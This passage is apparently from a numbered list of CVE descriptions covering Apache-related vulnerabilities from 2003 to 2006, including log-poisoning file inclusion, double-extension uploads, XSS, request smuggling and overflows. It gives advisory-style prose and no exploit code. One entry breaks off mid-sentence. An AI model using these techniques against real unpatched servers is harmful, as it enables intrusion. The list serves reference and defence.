12794| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
12795| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
12796| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
12797| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
12798| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
12799| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
12800| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
12801| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
12802| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
12803| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
12804| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
12805| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
12806| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
12807| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
12808| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
12809| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
12810| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
12811| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
12812| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
12813| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
12814| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
12815| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
12816| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
12817| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
12818| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
12819| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
12820| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
12821| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
12822| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
12823| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
12824| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
12825| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
12826| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
12827| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
12828| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
12829| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
12830| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
12831| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
12832| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
12833| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
12834| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
12835| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
12836| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
12837| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
12838| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
12839| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
12840| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
12841| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
12842| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
12843| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
12844| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
12845| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
12846| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
12847| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
12848| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
12849| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
12850| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
12851| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
12852| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
12853| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
12854| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
12855| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
12856| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
12857| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
12858| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
12859| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
12860| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
12861| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
12862| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
12863| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
12864| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
12865| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
12866| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
12867| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
12868| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
12869| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
12870| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
12871| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
12872| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
12873| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
12874| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
12875| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
12876| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
12877| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
12878| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
12879| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
12880| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
12881| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
12882| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
12883| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
12884| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
12885| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
12886| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
12887| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
12888| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
12889| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
12890| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
12891| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
12892| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
12893| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
12894| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
12895| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
12896| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
12897| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
12898| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
12899| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
12900| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
12901| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
12902| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
12903| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
12904| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
12905| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
12906| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
12907| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
12908| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
12909| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
12910| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
12911| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
12912| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
12913| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
12914| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
12915| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
12916| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
12917| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
12918| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
12919| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
12920| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
12921| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
12922| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
12923| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
